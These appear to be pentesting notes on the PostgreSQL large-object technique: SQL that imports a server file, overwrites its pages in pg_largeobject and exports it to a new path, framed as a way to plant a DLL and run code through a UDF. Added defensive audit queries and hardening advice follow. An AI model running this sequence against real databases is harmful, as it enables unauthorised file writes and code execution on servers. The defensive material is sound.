1. PSQL Large Object exploit

https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql

Description

What is a large object?

PostgreSQL exposes a structure called a large object, which is used for storing data that would be difficult to handle in its entirety.

The amount of data per page is defined to be LOBLKSIZE (which is currently BLCKSZ/4, or typically 2 kB).

What is the loid?

The loid is the identifier of a large object. It is central to the whole plan, because we need to reference it when exporting the large object to the file system.

What is pg_largeobject?

The large objects themselves are stored in a system table called pg_largeobject.


Exploit goal

Create a large object that will hold our binary payload (our custom DLL file we created in the previous section)
Export that large object to the remote server file system
Create a UDF that will use the exported DLL as source
Trigger the UDF and execute arbitrary code


Syntax

select lo_import('C:\\Windows\\win.ini');
\lo_list

The lo_import function also lets us set the loid to an arbitrary value of our choice when creating the large object:


select lo_import('C:\\Windows\\win.ini', 1337);

View the rows (one per 2 kB page) stored in pg_largeobject:

select loid, pageno from pg_largeobject;

select loid, pageno, encode(data, 'escape') from pg_largeobject;

update pg_largeobject set data=decode('77303074', 'hex') where loid=1337 and pageno=0;

select loid, pageno, encode(data, 'escape') from pg_largeobject;

select lo_export(1337, 'C:\\new_win.ini');

Unlink the large object once done:

\lo_unlink 1337
\lo_list
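The sequence above only works when the connecting role can call the server-side lo_import/lo_export functions and modify pg_largeobject, which by default means a superuser. The following audit queries are an added example for the defending DBA, not part of the original notes or of HackTricks. They assume PostgreSQL 11 or later (where pg_largeobject_metadata and the predefined role pg_write_server_files exist); the role name app_user in the last statement is a placeholder.

```sql
-- Added audit queries (not from the original notes). Assumes PostgreSQL 11+.
-- Queries 1 and 4 need superuser (or explicit SELECT on pg_largeobject).

-- 1. Inventory every large object: owner, number of 2 kB pages, total bytes.
--    A hand-picked loid (such as 1337) owned by an application role, or an
--    object whose first page looks like an executable, is worth investigating.
SELECT m.oid                              AS loid,
       r.rolname                          AS owner,
       count(p.pageno)                    AS pages,
       coalesce(sum(length(p.data)), 0)   AS bytes
FROM   pg_largeobject_metadata m
LEFT   JOIN pg_roles r       ON r.oid = m.lomowner
LEFT   JOIN pg_largeobject p ON p.loid = m.oid
GROUP  BY m.oid, r.rolname
ORDER  BY m.oid;

-- 2. Which roles can reach the server file system through lo_import/lo_export?
--    Only superusers can by default; any other role shown as true has been
--    granted EXECUTE explicitly or is a member of pg_write_server_files.
SELECT r.rolname,
       r.rolsuper,
       has_function_privilege(r.rolname, 'lo_import(text)',      'EXECUTE') AS can_lo_import,
       has_function_privilege(r.rolname, 'lo_export(oid, text)', 'EXECUTE') AS can_lo_export,
       pg_has_role(r.rolname, 'pg_write_server_files', 'MEMBER')            AS writes_server_files
FROM   pg_roles r
WHERE  r.rolname NOT LIKE 'pg\_%'
ORDER  BY r.rolname;

-- 3. lo_compat_privileges = on disables the ownership checks on large
--    objects; it should be off.
SHOW lo_compat_privileges;

-- 4. Hardening (run as superuser): take the server-side import/export
--    functions away from the application role. app_user is a placeholder.
REVOKE EXECUTE ON FUNCTION lo_import(text), lo_import(text, oid), lo_export(oid, text)
  FROM app_user;
```

Pair these with statement logging (log_statement = 'all' or pgaudit) and alert on any lo_import, lo_export or direct UPDATE of pg_largeobject issued from an application connection; a web application has no legitimate reason to execute them.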